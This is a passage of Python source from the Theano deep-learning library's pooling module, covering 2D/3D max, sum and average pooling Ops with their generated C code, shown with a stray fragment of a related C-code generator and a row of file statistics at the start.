            npy_intp o_idx[%(total_ndim)s];
            // placeholder for PyArray indexing (input)
            npy_intp i_idx[%(total_ndim)s];
            // loop over non-pooling dimensions
            int non_pooling_prod = 1;
            for (int i=0; i<%(non_pool_ndim)s; i++)
            {
                non_pooling_prod *= PyArray_DIMS(%(x)s)[i];
            }
            %(omp_parallel)s
            // first loop over non-pooling dimensions
            for (int t=0; t<non_pooling_prod; t++)
            {
                // compute the non-pooling index in each dimension
                if (%(non_pool_ndim)s!=0)
                {
                    o_idx[0] = t;
                    i_idx[0] = t;
                    for (int i=1; i<%(non_pool_ndim)s; i++)
                    {
                        o_idx[i] = o_idx[i - 1] / PyArray_DIMS(%(x)s)[i - 1];
                        o_idx[i - 1] = o_idx[i - 1] %% PyArray_DIMS(%(x)s)[i - 1];
                        i_idx[i] = o_idx[i];
                        i_idx[i - 1] = o_idx[i - 1];
                    }
                }
                // then loop over each region in each pooling dimension
        """
        # One nested loop per pooling dimension, computing the region bounds.
        for i in xrange(nd):
            ccode += """
                for (r_idx[%(i)s]=0; r_idx[%(i)s] < z[%(i)s]; r_idx[%(i)s]++) {
                  r_st[%(i)s] = r_idx[%(i)s] * st[%(i)s];
                  r_end[%(i)s] = r_st[%(i)s] + ws[%(i)s];
                  // skip the padding
                  r_st[%(i)s] = r_st[%(i)s] < pd[%(i)s] ? pd[%(i)s] : r_st[%(i)s];
                  r_end[%(i)s] = r_end[%(i)s] > (r[%(i)s] - pd[%(i)s]) ? r[%(i)s] - pd[%(i)s] : r_end[%(i)s];
                  // from padded_img space to img space
                  r_st[%(i)s] -= pd[%(i)s];
                  r_end[%(i)s] -= pd[%(i)s];
                  // handle the case where no padding, ignore border is True
                  if (%(params)s->ignore_border)
                  {
                    r_end[%(i)s] = r_end[%(i)s] > r[%(i)s] ? r[%(i)s] : r_end[%(i)s];
                  }
                  // use the index to find the correct position in the output
                  o_idx[%(non_pool_ndim)s + %(i)s] = r_idx[%(i)s];
            """ % dict(i=i, params=sub['params'], non_pool_ndim=non_pool_ndim)

        ccode += """
                  // get a pointer to the correct position in the output
                  dtype_%(z)s * z;
                  if (%(total_ndim)s == 4)
                    z = ((dtype_%(z)s*)(PyArray_GETPTR4(%(z)s, o_idx[0], o_idx[1], o_idx[2], o_idx[3])));
                  else
                    z = ((dtype_%(z)s*)(PyArray_GetPtr(%(z)s, o_idx)));
        """
        # Seed both collectors from the first element of the region.
        for i in xrange(nd):
            ccode += """
                  // set the first index of dimension %(i)s
                  i_idx[%(non_pool_ndim)s + %(i)s] = r_st[%(i)s];
            """ % dict(i=i, non_pool_ndim=non_pool_ndim)
        ccode += """
                  // use the first element as the initial value of collector
                  if (%(total_ndim)s == 4) {
                    collector = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
                    eval_collector = ((dtype_%(ex)s*)(PyArray_GETPTR4(%(ex)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
                  } else {
                    collector = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
                    eval_collector = ((dtype_%(ex)s*)(PyArray_GetPtr(%(ex)s,i_idx)))[0];
                  }
        """
        # Scan the region, tracking the max of x and the matching ex value.
        for i in xrange(nd):
            ccode += """
                  // go through the pooled region in the unpadded input
                  for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
                  {
                    i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
            """ % dict(i=i, non_pool_ndim=non_pool_ndim)
        ccode += """
                    // update maximum
                    dtype_%(x)s a;
                    dtype_%(ex)s ea;
                    if (%(total_ndim)s == 4) {
                      a = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
                      ea = ((dtype_%(ex)s*)(PyArray_GETPTR4(%(ex)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
                    }
                    else {
                      a = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
                      ea = ((dtype_%(ex)s*)(PyArray_GetPtr(%(ex)s,i_idx)))[0];
                    }
                    if (a > collector) {
                      collector = a;
                      eval_collector = ea;
                    }
        """
        for i in xrange(nd):
            ccode += """
                  } // for loop over region
            """
        ccode += """
                  z[0] = eval_collector;
        """
        for i in xrange(nd):
            ccode += """
                } // loop over pooling dimension
            """
        ccode += """
            } // for loop over non-pooling dimensions
        } // if z_prod
        """
        return ccode % locals()

    def c_code_cache_version(self):
        # Bump the integer when the generated C code changes; openmp is part
        # of the key because it alters the emitted source.
        return (1, self.openmp)
| 39.595865 | 139 | 0.490106 |
from __future__ import absolute_import, print_function, division
import warnings
import itertools
import numpy as np
from six.moves import xrange
import six.moves.builtins as builtins
import theano
from theano import gof, OpenMPOp, tensor, Variable, Apply
from theano.gof import ParamsType, EnumList
from theano.gradient import DisconnectedType
from theano.scalar import bool as bool_t
def max_pool_2d_same_size(input, patch_size):
    """Max-pool `input` over `patch_size` regions while keeping its size.

    Pools with ignore_border=True, then scatters the pooled values back
    through the max-pool gradient; positions that were not the regional
    maximum come back as zeros (presumably — follows from MaxPoolGrad
    routing values to argmax positions; confirm against MaxPoolGrad).
    """
    pooled = Pool(True)(input, patch_size)
    # Feeding the pooled output as both `maxout` and `gz` reconstructs a
    # tensor of the original size.
    return MaxPoolGrad(True)(input, pooled, pooled, patch_size)
def pool_2d(input, ws=None, ignore_border=None, stride=None, pad=(0, 0),
            mode='max', ds=None, st=None, padding=None):
    """Downscale `input` by pooling 2D regions of size `ws` with step `stride`.

    `ds`, `st` and `padding` are deprecated aliases of `ws`, `stride` and
    `pad` respectively; supplying both an alias and its replacement raises
    ValueError, supplying only the alias warns and forwards the value.
    """
    # --- resolve the deprecated 'ds' alias for 'ws' ---
    if ds is not None:
        if ws is not None:
            raise ValueError(
                "You can't provide a tuple value to both 'ws' and 'ds'."
                " Please provide a value only to 'ws'."
            )
        warnings.warn(
            "DEPRECATION: the 'ds' parameter is not going to exist"
            " anymore as it is going to be replaced by the parameter"
            " 'ws'.",
            stacklevel=2
        )
        ws = ds
    elif ws is None:
        # Neither the new nor the deprecated name was given.
        raise ValueError(
            "You must provide a tuple value for the window size."
        )

    # --- resolve the deprecated 'st' alias for 'stride' ---
    if st is not None:
        if stride is not None:
            raise ValueError(
                "You can't provide a tuple value to both 'st and 'stride'."
                " Please provide a value only to 'stride'."
            )
        warnings.warn(
            "DEPRECATION: the 'st' parameter is not going to exist"
            " anymore as it is going to be replaced by the parameter"
            " 'stride'.",
            stacklevel=2
        )
        stride = st

    # --- resolve the deprecated 'padding' alias for 'pad' ---
    if padding is not None:
        if pad not in {None, (0, 0)}:
            raise ValueError(
                "You can't provide a tuple value to both 'padding' and pad."
                " Please provide a value only to pad."
            )
        warnings.warn(
            "DEPRECATION: the 'padding' parameter is not going to exist"
            " anymore as it is going to be replaced by the parameter"
            " 'pad'.",
            stacklevel=2
        )
        pad = padding

    if input.ndim < 2:
        raise NotImplementedError('pool_2d requires a dimension >= 2')

    # The historical default for ignore_border is False; warn callers who
    # rely on it, since the default is scheduled to change.
    if ignore_border is None:
        warnings.warn(
            "pool_2d() will have the parameter ignore_border"
            " default value changed to True (currently"
            " False). To have consistent behavior with all Theano"
            " version, explicitly add the parameter ignore_border=True."
            " On the GPU, using ignore_border=True is needed to use cuDNN."
            " When using ignore_border=False and not using cuDNN, the only"
            " GPU combination supported is when"
            " `ws == stride and pad == (0, 0) and mode == 'max'`."
            " Otherwise, the convolution will be executed on CPU.",
            stacklevel=2)
        ignore_border = False

    return Pool(ignore_border, ndim=2, mode=mode)(input, ws, stride, pad)
def pool_3d(input, ws=None, ignore_border=None, stride=None, pad=(0, 0, 0),
            mode='max', ds=None, st=None, padding=None):
    """Downscale `input` by pooling 3D regions of size `ws` with step `stride`.

    `ds`, `st` and `padding` are deprecated aliases of `ws`, `stride` and
    `pad` respectively; supplying both an alias and its replacement raises
    ValueError, supplying only the alias warns and forwards the value.
    """
    # --- resolve the deprecated 'ds' alias for 'ws' ---
    if ds is not None:
        if ws is not None:
            raise ValueError(
                "You can't provide a tuple value to both 'ws' and 'ds'."
                " Please provide a value only to 'ws'."
            )
        warnings.warn(
            "DEPRECATION: the 'ds' parameter is not going to exist"
            " anymore as it is going to be replaced by the parameter"
            " 'ws'.",
            stacklevel=2
        )
        ws = ds
    elif ws is None:
        # Neither the new nor the deprecated name was given.
        raise ValueError(
            "You must provide a tuple value for the window size."
        )

    # --- resolve the deprecated 'st' alias for 'stride' ---
    if st is not None:
        if stride is not None:
            raise ValueError(
                "You can't provide a tuple value to both 'st and 'stride'."
                " Please provide a value only to 'stride'."
            )
        warnings.warn(
            "DEPRECATION: the 'st' parameter is not going to exist"
            " anymore as it is going to be replaced by the parameter"
            " 'stride'.",
            stacklevel=2
        )
        stride = st

    # --- resolve the deprecated 'padding' alias for 'pad' ---
    if padding is not None:
        if pad not in {None, (0, 0, 0)}:
            raise ValueError(
                "You can't provide a tuple value to both 'padding' and pad."
                " Please provide a value only to pad."
            )
        warnings.warn(
            "DEPRECATION: the 'padding' parameter is not going to exist"
            " anymore as it is going to be replaced by the parameter"
            " 'pad'.",
            stacklevel=2
        )
        pad = padding

    if input.ndim < 3:
        raise NotImplementedError('pool_3d requires a dimension >= 3')

    # The historical default for ignore_border is False; warn callers who
    # rely on it, since the default is scheduled to change.
    if ignore_border is None:
        warnings.warn(
            "pool_3d() will have the parameter ignore_border"
            " default value changed to True (currently"
            " False). To have consistent behavior with all Theano"
            " version, explicitly add the parameter ignore_border=True."
            " On the GPU, using ignore_border=True is needed to use cuDNN."
            " When using ignore_border=False and not using cuDNN, the only"
            " GPU combination supported is when"
            " `ws == stride and pad == (0, 0, 0) and mode == 'max'`."
            " Otherwise, the convolution will be executed on CPU.",
            stacklevel=2)
        ignore_border = False

    return Pool(ignore_border, ndim=3, mode=mode)(input, ws, stride, pad)
# C-level enum listing the supported pooling reductions, keyed by the same
# `mode` strings used by the Python-side Ops in this module.
# NOTE(review): presumably shared with GPU/cuDNN wrappers via ParamsType —
# confirm at the usage sites.
PoolingMode_t = EnumList(('POOLING_MAX', 'max'),
                         ('POOLING_SUM', 'sum'),
                         ('POOLING_AVERAGE_COUNT_INCLUDE_PADDING', 'average_inc_pad'),
                         ('POOLING_AVERAGE_COUNT_EXCLUDE_PADDING', 'average_exc_pad'))
class Pool(OpenMPOp):
    """
    Downsample the input over its last `ndim` dimensions by taking the max,
    sum or average over pooling regions of size `ws`, moved with step
    `stride`, optionally after symmetric zero-padding by `pad`.

    `ws`, `stride` and `pad` are symbolic inputs of the Apply node;
    `ignore_border`, `mode` and `ndim` are Op properties fixed at
    construction.
    """

    __props__ = ('ignore_border', 'mode', 'ndim')
    params_type = ParamsType(ignore_border=bool_t,)

    @staticmethod
    def out_shape(imgshape, ws=None, ignore_border=False, stride=None, pad=None,
                  ndim=2, ds=None, st=None, padding=None):
        """Return the output shape for input of shape `imgshape`.

        `ds`, `st` and `padding` are deprecated aliases of `ws`, `stride`
        and `pad`.  Works with both symbolic and concrete shape entries.
        """
        if ds is not None:
            if ws is not None:
                raise ValueError(
                    "You can't provide a tuple value to both 'ws' and 'ds'."
                    " Please provide a value only to 'ws'."
                )
            else:
                warnings.warn(
                    "DEPRECATION: the 'ds' parameter is not going to exist"
                    " anymore as it is going to be replaced by the parameter"
                    " 'ws'.",
                    stacklevel=2
                )
                ws = ds
        elif ds is None and ws is None:
            raise ValueError(
                "You must provide a tuple value for the window size."
            )
        if st is not None:
            if stride is not None:
                raise ValueError(
                    "You can't provide a tuple value to both 'st and 'stride'."
                    " Please provide a value only to 'stride'."
                )
            else:
                warnings.warn(
                    "DEPRECATION: the 'st' parameter is not going to exist"
                    " anymore as it is going to be replaced by the parameter"
                    " 'stride'.",
                    stacklevel=2
                )
                stride = st
        if padding is not None:
            zero_pad = (0,) * ndim
            if pad not in {None, zero_pad}:
                raise ValueError(
                    "You can't provide a tuple value to both 'padding' and pad."
                    " Please provide a value only to pad."
                )
            else:
                warnings.warn(
                    "DEPRECATION: the 'padding' parameter is not going to"
                    " exist anymore as it is going to be replaced by the"
                    " parameter 'pad'.",
                    stacklevel=2
                )
                pad = padding
        if ndim is None:
            ndim = 2
        assert ndim > 0
        if len(imgshape) < ndim:
            raise TypeError('imgshape must have at least {} dimensions'.format(ndim))
        if stride is None:
            stride = ws
        if pad is None:
            pad = (0,) * ndim
        # Padded size of each pooled dimension.
        patch_shape = tuple(tensor.extract_constant(imgshape[-ndim + i]) + pad[i] * 2
                            for i in xrange(ndim))

        def compute_out(v, downsample, stride):
            # Output length of one pooled dimension; handles both symbolic
            # and concrete values.
            if ignore_border:
                if downsample == stride:
                    return v // stride
                else:
                    out = (v - downsample) // stride + 1
                    if isinstance(out, theano.Variable):
                        return tensor.maximum(out, 0)
                    else:
                        return np.maximum(out, 0)
            else:
                if isinstance(v, theano.Variable):
                    return tensor.switch(tensor.ge(stride, downsample),
                                         (v - 1) // stride + 1,
                                         tensor.maximum(0, (v - 1 - downsample) //
                                                        stride + 1) + 1)
                elif stride >= downsample:
                    return (v - 1) // stride + 1
                else:
                    return max(0, (v - 1 - downsample + stride) // stride) + 1

        out_shape = [compute_out(patch_shape[i], ws[i], stride[i]) for i in xrange(ndim)]
        rval = list(imgshape[:-ndim]) + out_shape
        return rval

    def __init__(self, ignore_border=False, mode='max', ndim=2, openmp=None):
        super(Pool, self).__init__(openmp=openmp)
        self.ndim = ndim
        self.ignore_border = ignore_border
        # 'max_deterministic' is a historical alias of 'max'.
        if mode == 'max_deterministic':
            mode = 'max'
        if mode not in ['max', 'average_inc_pad', 'average_exc_pad', 'sum']:
            raise ValueError(
                "Pool mode parameter only support 'max', 'sum',"
                " 'average_inc_pad' and 'average_exc_pad'. Got %s" % mode)
        self.mode = mode

    def prepare_node(self, node, storage_map, compute_map, impl):
        # Backward-compatibility shim: old pickles stored ds/st/padding on
        # the Op and had a single input; convert them to constant inputs.
        if len(node.inputs) == 1:
            self.ndim = len(node.op.ds)
            self.mode = node.op.mode
            ws = theano.tensor.constant(node.op.ds)
            st = theano.tensor.constant(node.op.st)
            pad = theano.tensor.constant(node.op.padding)
            node.inputs.append(ws)
            node.inputs.append(st)
            node.inputs.append(pad)
            if isinstance(ws, theano.Constant):
                storage_map[ws] = [ws.data]
                compute_map[ws] = [True]
            else:
                storage_map[ws] = [None]
                compute_map[ws] = [False]
            if isinstance(st, theano.Constant):
                storage_map[st] = [st.data]
                compute_map[st] = [True]
            else:
                storage_map[st] = [None]
                compute_map[st] = [False]
            if isinstance(pad, theano.Constant):
                storage_map[pad] = [pad.data]
                compute_map[pad] = [True]
            else:
                storage_map[pad] = [None]
                compute_map[pad] = [False]

    def make_node(self, x, ws, stride=None, pad=None):
        """Validate and canonicalize inputs; the output keeps x's dtype."""
        x = tensor.as_tensor_variable(x)
        nd = self.ndim
        if stride is None:
            stride = ws
        if pad is None:
            pad = (0,) * nd
        elif isinstance(pad, (tuple, list)):
            if max(pad) != 0 and not self.ignore_border:
                raise NotImplementedError(
                    'padding works only with ignore_border=True')
            if isinstance(ws, (tuple, list)):
                if any(pad[i] >= ws[i] for i in range(nd)):
                    raise NotImplementedError(
                        'padding must be smaller than strides')
        ws = tensor.as_tensor_variable(ws)
        stride = tensor.as_tensor_variable(stride)
        pad = tensor.as_tensor_variable(pad)
        assert ws.ndim == 1
        assert stride.ndim == 1
        assert pad.ndim == 1
        if x.type.ndim < nd:
            raise TypeError()
        if ws.dtype not in tensor.int_dtypes:
            raise TypeError('Pool downsample parameters must be ints.')
        if stride.dtype not in tensor.int_dtypes:
            raise TypeError('Stride parameters must be ints.')
        if pad.dtype not in tensor.int_dtypes:
            raise TypeError('Padding parameters must be ints.')
        broad = x.broadcastable[:-nd] + (False,) * nd
        out = tensor.TensorType(x.dtype, broad)
        return gof.Apply(self, [x, ws, stride, pad], [out()])

    def perform(self, node, inp, out, params):
        """Python fallback: reduce each pooling region with max/sum/average."""
        x, ws, stride, pad = inp
        z, = out
        nd = self.ndim
        assert ws.shape == stride.shape == pad.shape == (nd,)
        if len(x.shape) < nd:
            raise NotImplementedError(
                'Pool requires input with {} or more dimensions'.format(nd))
        z_shape = self.out_shape(x.shape, ws, params.ignore_border, stride, pad, nd)
        if not params.ignore_border:
            assert all(z > 0 for z in z_shape[-nd:])
        if (z[0] is None) or (z[0].shape != z_shape):
            z[0] = np.empty(z_shape, dtype=x.dtype)
        zz = z[0]
        # size of pooling output
        pool_out_shp = zz.shape[-nd:]
        img_shp = tuple(x.shape[-nd + i] + 2 * pad[i] for i in xrange(nd))
        inc_pad = self.mode == 'average_inc_pad'
        # zero-pad the input if requested
        if max(pad) != 0:
            y = np.zeros(x.shape[:-nd] + img_shp, dtype=x.dtype)
            y[(slice(None),) * (len(x.shape) - nd) +
              tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = x
        else:
            y = x
        # pick the reduction matching self.mode
        func = np.max
        if self.mode == 'sum':
            func = np.sum
        elif self.mode != 'max':
            func = np.average
        # precompute the region boundaries for each dimension
        region_slices = [[] for i in xrange(nd)]
        for i in xrange(nd):
            for j in xrange(pool_out_shp[i]):
                start = j * stride[i]
                end = builtins.min(start + ws[i], img_shp[i])
                if not inc_pad:
                    start = builtins.max(start, pad[i])
                    end = builtins.min(end, img_shp[i] - pad[i])
                region_slices[i].append(slice(start, end))
        # iterate over non-pooling dimensions, then over pooling regions
        for k in np.ndindex(*x.shape[:-nd]):
            zzk = zz[k]
            yk = y[k]
            for r in np.ndindex(*pool_out_shp):
                # FIX: index with a *tuple* of slices.  Indexing with a
                # list of slices was deprecated in NumPy 1.15 and raises
                # in later versions.
                zzk[r] = func(
                    yk[tuple(region_slices[i][r[i]] for i in xrange(nd))])

    def infer_shape(self, node, in_shapes):
        ws, stride, pad = [node.inputs[1], node.inputs[2], node.inputs[3]]
        shp = self.out_shape(in_shapes[0], ws, self.ignore_border, stride,
                             pad, self.ndim)
        return [shp]

    def L_op(self, inputs, outputs, grads):
        # Gradients wrt ws/stride/pad are disconnected (integer parameters).
        x, ws, stride, pad = inputs
        gz, = grads
        disc = [DisconnectedType()() for i in inputs[1:]]
        if self.mode == 'max':
            return [MaxPoolGrad(ndim=self.ndim,
                                ignore_border=self.ignore_border)(
                x, outputs[0], gz, ws=ws, stride=stride, pad=pad)] + disc
        else:
            return [AveragePoolGrad(ndim=self.ndim,
                                    ignore_border=self.ignore_border,
                                    mode=self.mode)(
                x, gz, ws=ws, stride=stride, pad=pad)] + disc

    def connection_pattern(self, node):
        # Only the first input (x) is connected to the output.
        return [[1], [0], [0], [0]]

    def R_op(self, inputs, eval_points):
        if self.mode != 'max':
            # Sum/average pooling is linear, so the R-op is the op itself
            # applied to the evaluation point.
            eval_inputs = [eval_points[0]] + inputs[1:]
            return [self(*eval_inputs)]
        if eval_points[0] is None:
            return [None]
        z = self(*inputs)
        x, ws, stride, pad = inputs
        return [
            DownsampleFactorMaxGradGrad(self.ignore_border, self.mode,
                                        self.ndim)(x, z, eval_points[0], ws,
                                                   stride, pad)
        ]

    def c_headers(self):
        # std::max is used in the generated code.
        headers = ['<algorithm>']
        headers += super(Pool, self).c_headers()
        return headers

    def c_code(self, node, name, inp, out, sub):
        """Generate C code implementing `perform` for the supported modes."""
        if self.mode not in ('max', 'sum', 'average_exc_pad', 'average_inc_pad'):
            raise theano.gof.utils.MethodNotDefined()
        x, ws, stride, pad = inp
        z, = out
        nd = self.ndim
        total_ndim = node.inputs[0].ndim
        non_pool_ndim = total_ndim - nd
        fail = sub['fail']
        params = sub['params']

        if self.openmp:
            # run in parallel over each pooling block
            omp_parallel = '#pragma omp parallel for private(r_st, r_end, r_idx, i_idx, o_idx, collector) schedule(static)'
        else:
            omp_parallel = ''

        # Argument validation, output-shape computation and (re)allocation.
        ccode = """
        int typenum = PyArray_ObjectType((PyObject*)%(x)s, 0);
        if(PyArray_NDIM(%(x)s)!=%(total_ndim)s)
        {
            PyErr_SetString(PyExc_ValueError, "x must be a %(total_ndim)sD ndarray");
            %(fail)s;
        }
        if(PyArray_DIM(%(ws)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "ws must be a vector of size %(nd)s");
            %(fail)s;
        }
        if(PyArray_DIM(%(stride)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "stride must be a vector of size %(nd)s");
            %(fail)s;
        }
        if(PyArray_DIM(%(pad)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "pad must be a vector of size %(nd)s");
            %(fail)s;
        }
        int z[%(nd)s]; // shape of the output
        int r[%(nd)s]; // shape of the padded_input
        int ws[%(nd)s];
        int st[%(nd)s];
        int pd[%(nd)s];
        int nonzero_padding;
        nonzero_padding = 0;
        for (int i=0; i<%(nd)s; i++)
        {
            ws[i] = *((npy_intp*)PyArray_GETPTR1(%(ws)s, i));
            st[i] = *((npy_intp*)PyArray_GETPTR1(%(stride)s, i));
            pd[i] = *((npy_intp*)PyArray_GETPTR1(%(pad)s, i));
            r[i] = PyArray_DIMS(%(x)s)[%(non_pool_ndim)s + i] + 2 * pd[i];
            if (pd[i]>0)
                nonzero_padding = 1;
        }
        if (!%(params)s->ignore_border && nonzero_padding)
        {
            PyErr_SetString(PyExc_ValueError,
              "padding must be zero when ignore border is False");
            %(fail)s;
        }
        if (%(params)s->ignore_border)
        {
            for (int i=0; i<%(nd)s; i++)
            {
                // '/' in C is different from '/' in python
                if (r[i] - ws[i] < 0)
                {
                    z[i] = 0;
                }
                else
                {
                    z[i] = (r[i] - ws[i]) / st[i] + 1;
                }
            }
        }
        else
        {
            for (int i=0; i<%(nd)s; i++)
            {
                // decide how many rows/cols the output has
                if (st[i] >= ws[i])
                {
                    z[i] = (r[i] - 1) / st[i] + 1;
                }
                else
                {
                    z[i] = std::max(0, (r[i] - 1 - ws[i] + st[i]) / st[i]) + 1;
                }
                assert(z[i] > 0);
            }
        }
        // memory allocation of z if necessary
        int mem_nec;
        mem_nec = 0;
        if ((!%(z)s) || *PyArray_DIMS(%(z)s)!=%(total_ndim)s)
        {
            mem_nec = 1;
        }
        if (!mem_nec)
        {
            for (int i=0; i<%(non_pool_ndim)s; i++)
            {
                if (PyArray_DIMS(%(z)s)[i] != PyArray_DIMS(%(x)s)[i])
                {
                    mem_nec = 1;
                    break;
                }
            }
        }
        if (!mem_nec)
        {
            for (int i=0; i<%(nd)s; i++)
            {
                if (PyArray_DIMS(%(z)s)[%(non_pool_ndim)s + i] != z[i])
                {
                    mem_nec = 1;
                    break;
                }
            }
        }
        if (mem_nec)
        {
          if (%(z)s) Py_XDECREF(%(z)s);
          npy_intp dims[%(total_ndim)s];
          for (int i=0; i<%(non_pool_ndim)s; i++)
          {
              dims[i] = PyArray_DIMS(%(x)s)[i];
          }
          for (int i=0; i<%(nd)s; i++)
          {
              dims[%(non_pool_ndim)s + i] = z[i];
          }
          //TODO: zeros not necessary
          %(z)s = (PyArrayObject*) PyArray_ZEROS(%(total_ndim)s, dims, typenum,0);
        }
        // initialize temp var for the value in a region
        dtype_%(x)s collector;
        int z_prod;
        // do not run if any z[i] is zero
        z_prod = 1;
        for (int i=0; i<%(nd)s; i++)
        {
            z_prod *= z[i];
        }
        if (z_prod)
        {
            // will be used to hold start and end index of a region
            int r_st[%(nd)s];
            int r_end[%(nd)s];
            // index for iterating over the pooling regions
            int r_idx[%(nd)s];
            // placeholder for PyArray indexing (output)
            npy_intp o_idx[%(total_ndim)s];
            // placeholder for PyArray indexing (input)
            npy_intp i_idx[%(total_ndim)s];
            // loop over non-pooling dimensions
            int non_pooling_prod = 1;
            for (int i=0; i<%(non_pool_ndim)s; i++)
            {
                non_pooling_prod *= PyArray_DIMS(%(x)s)[i];
            }
            %(omp_parallel)s
            // first loop over non-pooling dimensions
            for (int t=0; t<non_pooling_prod; t++)
            {
                // compute the non-pooling index in each dimension
                if (%(non_pool_ndim)s!=0)
                {
                    o_idx[0] = t;
                    i_idx[0] = t;
                    for (int i=1; i<%(non_pool_ndim)s; i++)
                    {
                        o_idx[i] = o_idx[i - 1] / PyArray_DIMS(%(x)s)[i - 1];
                        o_idx[i - 1] = o_idx[i - 1] %% PyArray_DIMS(%(x)s)[i - 1];
                        i_idx[i] = o_idx[i];
                        i_idx[i - 1] = o_idx[i - 1];
                    }
                }
                // then loop over each region in each pooling dimension
        """
        # One nested loop per pooling dimension, computing the region bounds.
        for i in xrange(nd):
            ccode += """
                for (r_idx[%(i)s]=0; r_idx[%(i)s] < z[%(i)s]; r_idx[%(i)s]++) {
                  r_st[%(i)s] = r_idx[%(i)s] * st[%(i)s];
                  r_end[%(i)s] = r_st[%(i)s] + ws[%(i)s];
                  // skip the padding
                  r_st[%(i)s] = r_st[%(i)s] < pd[%(i)s] ? pd[%(i)s] : r_st[%(i)s];
                  r_end[%(i)s] = r_end[%(i)s] > (r[%(i)s] - pd[%(i)s]) ? r[%(i)s] - pd[%(i)s] : r_end[%(i)s];
                  // from padded_img space to img space
                  r_st[%(i)s] -= pd[%(i)s];
                  r_end[%(i)s] -= pd[%(i)s];
                  // handle the case where no padding, ignore border is True
                  if (%(params)s->ignore_border)
                  {
                    r_end[%(i)s] = r_end[%(i)s] > r[%(i)s] ? r[%(i)s] : r_end[%(i)s];
                  }
                  // use the index to find the correct position in the output
                  o_idx[%(non_pool_ndim)s + %(i)s] = r_idx[%(i)s];
            """ % dict(i=i, non_pool_ndim=non_pool_ndim, params=sub['params'])

        ccode += """
                  // get a pointer to the correct position in the output
                  dtype_%(z)s * z;
                  if (%(total_ndim)s == 4)
                    z = ((dtype_%(z)s*)(PyArray_GETPTR4(%(z)s, o_idx[0], o_idx[1], o_idx[2], o_idx[3])));
                  else
                    z = ((dtype_%(z)s*)(PyArray_GetPtr(%(z)s, o_idx)));
        """
        if self.mode == 'max':
            # Seed the collector with the region's first element, then scan.
            for i in xrange(nd):
                ccode += """
                  // set the first index of dimension %(i)s
                  i_idx[%(non_pool_ndim)s + %(i)s] = r_st[%(i)s];
                """ % dict(i=i, non_pool_ndim=non_pool_ndim)
            ccode += """
                  // use the first element as the initial value of collector
                  if (%(total_ndim)s == 4)
                    collector = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
                  else
                    collector = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
            """
            for i in xrange(nd):
                ccode += """
                  // go through the pooled region in the unpadded input
                  for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
                  {
                    i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
                """ % dict(i=i, non_pool_ndim=non_pool_ndim)
            ccode += """
                    // update maximum
                    dtype_%(x)s a;
                    if (%(total_ndim)s == 4)
                      a = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
                    else
                      a = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
                    collector = (a > collector) ? a : collector;
            """
            for i in xrange(nd):
                ccode += """
                  } // for loop over region
                """
            ccode += """
                  z[0] = collector;
            """
        elif self.mode in ('sum', 'average_exc_pad', 'average_inc_pad'):
            # Accumulate a sum, then divide by the region size for averages.
            ccode += """
                  // initialize the sum at zero
                  collector = ((dtype_%(x)s)(0));
            """
            for i in xrange(nd):
                ccode += """
                  // go through the pooled region in the unpadded input
                  for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
                  {
                    i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
                """ % dict(i=i, non_pool_ndim=non_pool_ndim)
            ccode += """
                    // update sum
                    dtype_%(x)s a;
                    if (%(total_ndim)s == 4)
                      a = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
                    else
                      a = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
                    collector += a;
            """
            for i in xrange(nd):
                ccode += """
                  } // for loop over region
                """
            if self.mode == "sum":
                ccode += """
                  z[0] = collector;
                """
            elif self.mode == 'average_inc_pad' and self.ignore_border:
                # region size includes the padding
                region_size = ' * '.join('ws[%d]' % i for i in xrange(nd))
                ccode += """
                  z[0] = collector / (%(region_size)s);
                """ % dict(region_size=region_size)
            else:
                # region size excludes the padding
                region_size = ' * '.join('(r_end[%d]-r_st[%d])' % (i, i) for i in xrange(nd))
                ccode += """
                  z[0] = collector / (%(region_size)s);
                """ % dict(region_size=region_size)
        for i in xrange(nd):
            ccode += """
                } // loop over pooling dimension
            """
        ccode += """
            } // for loop over non-pooling dimensions
        } // if z_prod
        """
        return ccode % locals()

    def c_code_cache_version(self):
        # Bump the integer when the generated C code changes; openmp is part
        # of the key because it alters the emitted source.
        return (9, self.openmp)
class PoolGrad(OpenMPOp):
    """Base class for the gradient Ops of :class:`Pool`.

    Holds the shared ``out_shape`` helper and the old-pickle conversion in
    ``prepare_node``; concrete gradients (e.g. ``MaxPoolGrad``) subclass it.
    """

    __props__ = ('ignore_border', 'mode', 'ndim')

    @staticmethod
    def out_shape(imgshape, ws=None, ignore_border=False, stride=None, pad=None, ndim=2,
                  ds=None, st=None, padding=None):
        """Return the pooled output shape for input of shape `imgshape`.

        `ds`, `st` and `padding` are deprecated aliases of `ws`, `stride`
        and `pad`.  Mirrors ``Pool.out_shape``; keep the two in sync.
        """
        # --- resolve deprecated aliases ---
        if ds is not None:
            if ws is not None:
                raise ValueError(
